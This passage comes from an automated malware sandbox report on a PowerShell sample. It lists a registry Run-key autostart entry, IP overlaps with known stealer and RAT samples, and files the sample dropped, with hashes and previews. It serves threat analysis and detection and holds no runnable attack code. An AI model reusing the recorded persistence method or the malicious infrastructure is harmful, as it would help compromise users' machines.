                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes were analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: IaslcsMo.ps1
                                                                                          Time | Type | Description
                                                                                          04:53:51 | API Interceptor | 45x Sleep call for process: powershell.exe modified
                                                                                          04:54:26 | API Interceptor | 9x Sleep call for process: msiexec.exe modified
                                                                                          09:54:08 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          09:54:16 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NetUtilityApp C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          172.67.75.40zkGOUJOnmc.elfGet hashmaliciousUnknownBrowse
                                                                                          • arc-gym.com.cutestat.com/wp-login.php
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          rentry.coowuP726k3d.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                          • 172.67.75.40
                                                                                          gkzHdqfg.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.75.40
                                                                                          xaSPJNbl.ps1Get hashmaliciousLummaCBrowse
                                                                                          • 172.67.75.40
                                                                                          Exploit Detector.batGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.75.40
                                                                                          MilwaukeeRivers.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.75.40
                                                                                          http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                          • 104.26.2.16
                                                                                          RobCheat.exeGet hashmaliciousPython Stealer, CStealerBrowse
                                                                                          • 172.67.75.40
                                                                                          Spedizione.vbsGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.75.40
                                                                                          sims-4-updater-v1.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.75.40
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.88.250
                                                                                          https://google.lt/amp/taerendil.online.fr/gpfv9cqYcuejGaVElbEvNcI6wCkeoGet hashmaliciousUnknownBrowse
                                                                                          • 104.16.40.28
                                                                                          file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 172.64.41.3
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 172.67.155.47
                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 172.67.177.134
                                                                                          DATASHEET.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                          • 172.67.74.152
                                                                                          IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                          • 172.67.186.192
                                                                                          VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                          • 104.21.67.152
                                                                                          order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                          • 104.21.67.152
                                                                                          http://google.comGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.136.186
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          t90RvrDNvz.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          docx008.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          docx002.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          docx009.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          docx007.docx.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.2.224
                                                                                          • 172.67.75.40
                                                                                          No context
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):26604
                                                                                          Entropy (8bit):5.053883819182895
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:SLbV3IpNBQkj2Uh4iUxkOZhxCardFvJ+OdBOtAHkvNZzNKe1MlYoaYP:SLbV3CNBQkj2Uh4iUxkOgqdJJ+OdBOtW
                                                                                          MD5:9F5869709E8C10EC941464657FF26A26
                                                                                          SHA1:85B55A98AE8580126A59765159A82601385D62C1
                                                                                          SHA-256:BE6F41D8AEEAF9183CB61B633B3F46A7B7DBDC2954F40C7A75B5CD5800E0F0C3
                                                                                          SHA-512:C7884E74269AF609DB901DD2E7639CB4022AAB434C3B387FF3DC952C1689BBD70F675DEAA49B48A6725716D144C325F0A996B9B1DDB4D1FD83BA70CBEA0E4BD5
                                                                                          Malicious:false
                                                                                          Preview:PSMODULECACHE.(...m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):0.7307872139132228
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Nlllul:NllU
                                                                                          MD5:6DA15BE18F0DF00B9DC2DC6B72B103F2
                                                                                          SHA1:4ADB8B407D51A20952CB8E4EC0349D742862B568
                                                                                          SHA-256:19704E2940D1D9E46CF80F36AAB157098B0A8C61865C087167F9AFA9A9F70352
                                                                                          SHA-512:5BF5FF5A02FA55C13D6DD266361F8DD2747DD657ABF21032E7DD3E9C28D65A3E9CB88F5AE7E6F2029E9FC37D5EA90C020F6423092C84DE41A2AD7E0DCBC72EB4
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1045367
                                                                                          Entropy (8bit):7.572445590244692
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:/2kc2aVBUtix/kH511EEYWNppxq3NnASaNIW:/2B2OuYx8XBYWohAP
                                                                                          MD5:397BC51806ABD0FA996E0403133CD98C
                                                                                          SHA1:2DCDC2B97CA3F2B45E93416BA80FB386ED3C9E1A
                                                                                          SHA-256:66FF2B7979FFA4DEF09A15280B74EDF1D5272E55D4894B5900B5E9D54334215E
                                                                                          SHA-512:F103DD67FE2CF0259056B9684FB457C292D76E13E2473E461482CEFE8372B8618C1E05BBD2B080DF3965A09CC1CE51C8130D2A24AD3F36A77DD35ECCDF635E15
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1045367
                                                                                          Entropy (8bit):7.572442714185415
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:z2kc2aVBUtix/kH511EEYWNppxq3NnASaNIW:z2B2OuYx8XBYWohAP
                                                                                          MD5:A81F98399CB1432064BE3CBE374E248F
                                                                                          SHA1:C5023639F225C81B0B04384D856860CA301BB70B
                                                                                          SHA-256:CB6DA873FA677401F9B30E79E2907CC164143E5ADB4B6333538DCAA6E3EB8DA5
                                                                                          SHA-512:595498722B813970DEAA4D8DD86C9909D953AA0482A6A02CFAEEFD0C3546C794AB9BE77F7D42C5A32A7703231B322D94C22B02CA23C3C704CAC62E667D8CA5E0
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:HTML document, ASCII text, with very long lines (8771), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):8771
                                                                                          Entropy (8bit):6.1675656006183335
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:PN2x2BEiNI4IEmJHpaZYRUhfNpGZKwSDxKyFN:AxKNmHW3hfXGZuDxfN
                                                                                          MD5:8DDAAF95412592AB5356AE96E52827B7
                                                                                          SHA1:9A7B693544143B58A06C44F60BB8FA682711E9BA
                                                                                          SHA-256:FE61424D18E770B7FD8EFAC99F19E72D4C8D8BE0F08B5A9E69B5B9B2C8A45927
                                                                                          SHA-512:FDCB450BEE0C53DC6A96A8008E28F02F4D6824E0E213B0910B0C96E85F003345697798B001BF23C668B37FCDE8744CDC72016AB683690033ED18BAE46D654CA4
                                                                                          Malicious:true
                                                                                          Preview:<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;font-weight:500;line-height:2.25rem}@media (width <= 720px){.h2{font-size:1.25rem;line-height:1.5rem}}#challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0i
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                          Process:C:\Windows\SysWOW64\more.com
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):311808
                                                                                          Entropy (8bit):6.838546349295719
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:t5g9PjKfx5xWc/SW7wP+wkdGdfJ7rLRjqPz6LLi:tG9PjOxWca1OYfJjomC
                                                                                          MD5:02522A466B7EB24788120FE94D0EA99A
                                                                                          SHA1:A1A4E6490099437B88FCAA8D9367F3C9009A4644
                                                                                          SHA-256:C940F003D68479BC791145974A859697A8CD5F2E5D71A08D6FAE8B1188FF12EA
                                                                                          SHA-512:136BD178A5F714EA1212639AAFA1F91F0FB96933F9B4406C6A10E8966C55A90BDD6F88E8D26BEFE9C39E1BCA69854C360058B2C88A763E39B4AF6B65115D0FB9
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 62%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):6221
                                                                                          Entropy (8bit):3.73823279812991
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:Nrkem33CxHPfhkvhkvCCtWmzb6ym7Hxmzb6yk7HD:NoHyvf9WmPUtmPW3
                                                                                          MD5:B0F2DCCC286A4C73FFA5E6DE4C7C8F02
                                                                                          SHA1:0B924DDF92572B71542AC41E3ECE6B73ED489F98
                                                                                          SHA-256:4D5C32411F65CFD8289341ABFDEF0C79B7EE2A94B85966FDF55C9193B2504703
                                                                                          SHA-512:0872EEDFC43D9E59DAA4874AEB87A59928E12EC4F915C4A583A0E9CAF715FC46874C6232A58F28C0745D0AD5F3730BF1A3EB3046FBF3C4EC2907F2A24B231A94
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2598912
                                                                                          Entropy (8bit):6.604555317326718
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:5TFgiFpGXOENKRgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07M:5+iDaljxJsv6tWKFdu9CZgfn
                                                                                          MD5:17D26D22913C19D7A93F7F6AF7EC5D95
                                                                                          SHA1:0BBC1E108AF53990E4B9F2C34CBF7EFBE442BC92
                                                                                          SHA-256:E18684E62B3C076B91A776B71539A8B7640932055AE0831B73AD5FEE7C5DD4E7
                                                                                          SHA-512:FB2A4288BE915D7E62E6DCD1A4425A77C5DA69CC58DAA7F175B921FD017CDDB07F0D76C9016EB40475DEAD5DC7984B32B988AD6F5C5D14813B5A9E2867EB629A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):8581632
                                                                                          Entropy (8bit):6.736578346160889
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                          MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                          SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                          SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                          SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):1053696
                                                                                          Entropy (8bit):6.539052666912709
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                          MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                          SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                          SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                          SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):356352
                                                                                          Entropy (8bit):6.447802510709224
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                          MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                          SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                          SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                          SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):669792
                                                                                          Entropy (8bit):6.967035663118671
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:1/gzbnbASodCXNn5FJX5KrN9VmoBBDFDn8j:FRSoSn5FJX5KZ9VmoDKj
                                                                                          MD5:F75225DB13E3B86477DC8658C63F9B99
                                                                                          SHA1:6FFD5596FD69E161B788001ABAB195CC609476CF
                                                                                          SHA-256:4286CF3C1ED10B8D6E2794AB4ED1CFCDED0EA40D6794016CE926CD9B547C6A00
                                                                                          SHA-512:07DEE210DE39E9F303BB72558C4B2AEB5DE597638F0A5BFDCBE8F8BADFB46A45F7A1518726D543F18682214668D22586299159E2C3947A9285990867BC457327
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:Atari 68xxx CPX file (version 4d53)
                                                                                          Category:dropped
                                                                                          Size (bytes):15400
                                                                                          Entropy (8bit):5.921776181449881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:/O3hRJxZvLMOOXgLaQPCDSupU5dwbADeQ6QirDde8QjbcRIo70xdF3yRLZ1XrRbP:gh5dLMOOUVu6gSeDWXo70d3yTJRb+K
                                                                                          MD5:744424FBBAC9BBA03E53DEA3587E327E
                                                                                          SHA1:B1CD89346897AA9A0787336B44E638E231B3CC15
                                                                                          SHA-256:E34C2C400FC112E079D825580F536EE43D5951F4DCA0C2C6C9C521CA609F09A5
                                                                                          SHA-512:7C2291B8E813EFD2C55D4D55620C435205848FCB3E0D7F8DC3153AFA7D6B4BCA7BBF80BB3F3732F850F80ADD87D8165DEEB3B94BC735A70E18509E276627E812
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):798054
                                                                                          Entropy (8bit):7.892501542250156
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:TwzX9HIvQxLWZ+Q6znQ1VK5eTlVUQgEiG9UzV+RhmwhvpYmgDH/3:ghIvSWZ+RStN5B9MV+RhmeizP
                                                                                          MD5:150E5E57AE9177A2CD6E587DF2D3B0EA
                                                                                          SHA1:88C981FB86B2624165CD1FAB41F2C7CCEB57151F
                                                                                          SHA-256:1C11168B529642BA3139672E4DD6BE5B1CAB7A206F220554155AF997427D3DA8
                                                                                          SHA-512:361C1596782BB064169F8BA622838EE945CB83CA422FF3277EEBF574AC3E6257B7470A6705E0E4DA2E996971EC04A849BBB45F8D86181A4DB74B782A47814107
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):421200
                                                                                          Entropy (8bit):6.59808962341698
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                          MD5:03E9314004F504A14A61C3D364B62F66
                                                                                          SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                          SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                          SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):770384
                                                                                          Entropy (8bit):6.908020029901359
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                          MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                          SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                          SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                          SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1054613
                                                                                          Entropy (8bit):4.601238684297783
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:HCH/qJhYLq2SudOFFEpSQjV2SFq3Pxl2ZRN6hhQvb/0nPubFnkFrAt:8FLZGFEnJt6hhQ0PykFY
                                                                                          MD5:224D05879C6F2B9708EDBB7CF244E76E
                                                                                          SHA1:5DB1157DDFEFFC4C30650B21F014530470EFE729
                                                                                          SHA-256:8E58FFD1BA32AB7EAE118F2861ED1449F49A3CD0C459DF2AC26A1FF1BF4D7245
                                                                                          SHA-512:D3CF29A37D3B5E1FAA7B8153FB2C21DB9A65868530C51D8E589CDD2E010674CD93610DDC10309D15DF07B6E9E6D6D892C8DB0E16E67638BF72BEAD9FC83E4AB9
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0"?>..<doc>.. <assembly>.. <name>NAudio</name>.. </assembly>.. <members>.. <member name="T:NAudio.Codecs.ALawDecoder">.. <summary>.. a-law decoder.. based on code from:.. http://hazelware.luggle.com/tutorials/mulawcompression.html.. </summary>.. </member>.. <member name="F:NAudio.Codecs.ALawDecoder.ALawDecompressTable">.. <summary>.. only 512 bytes required, so just use a lookup.. </summary>.. </member>.. <member name="M:NAudio.Codecs.ALawDecoder.ALawToLinearSample(System.Byte)">.. <summary>.. Converts an a-law encoded byte to a 16 bit linear sample.. </summary>.. <param name="aLaw">a-law encoded byte</param>.. <returns>Linear sample</returns>.. </member>.. <member name="T:NAudio.Codecs.ALawEncoder">.. <summary>.. A-law encoder.. </
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):424552
                                                                                          Entropy (8bit):6.000236226718345
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:bebeJQsqiaJnFdHfQoB9bls1YxRz5QZ1y+ymaQfA30KQBhYJXv4M4Mz07ROZH1pH:jh+nf4+tG/vyohq4M4M4gl7T
                                                                                          MD5:A341D9BFAAE6A784CB9E2EA49C183FB4
                                                                                          SHA1:D061C12DFFA6A725F649DAE49C99F157E93BB175
                                                                                          SHA-256:52416BB8275988AA5145BE6359B6C6A92E3C20817544682C2C1978B50FF2052C
                                                                                          SHA-512:9DFF4BA2ABF889C9F9E71DA1F91ABDDE1742A542B53E8C289E011113E1BCB86D4B1AAF5E7AADF97AA5ED36AB50227295E27CE700D30524F7198FD8F3928C36A2
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1106
                                                                                          Entropy (8bit):5.038231865445437
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dV8F7H3p2/+XBPpZp2/+XBPqp2/+XBw1irkV:cVg7C+XBR4+XBn+XBvrE
                                                                                          MD5:75E66AB540561A0C7D4160271F518243
                                                                                          SHA1:AD6501E407D216744B6C3DE76D7664D9581EBAD2
                                                                                          SHA-256:091AFFF3BB63024B5A7B14EA30306B6753858FD1A33FC8C98E3B5E65FE92FBE7
                                                                                          SHA-512:FCB55C0FDBB984B06AFF2FAFCAEA2596C175AA5A07D2F1A401305D3441338AA266A53D2DE7A7577684884A2E12CE3EE430B2E1D0210684A7EEFAF9EAA0DE115F
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.... <appSettings>.. <add key="DownloadLocation" value=""/>.. </appSettings>.... <runtime>.... <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.... <dependentAssembly>.... <assemblyIdentity name="System.Runtime" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Threading.Tasks" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... <dependentAssembly>.... <assemblyIdentity name="System.Net.Http" publicKeyToken="b03f5f7f11d50a3a" culture="neutral"/>.... <bindingRedirect oldVersion="0.0.0.0-4.0.0.0" newVersion="4.0.0.0"/>.... </dependentAssembly>.... </assemblyBinding>.... </runtime>
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4917656
                                                                                          Entropy (8bit):6.3987875878837785
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:+CZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvdiD0N+YEzI4og/RfzHLeHTRhFRNZ:tG2QCwmHjnog/pzHAo/Ay
                                                                                          MD5:B37CC24FCFDCCA9DEAD17A498E66DB9C
                                                                                          SHA1:C959AB27CE476DCB0C7312C30C613FE3307BB877
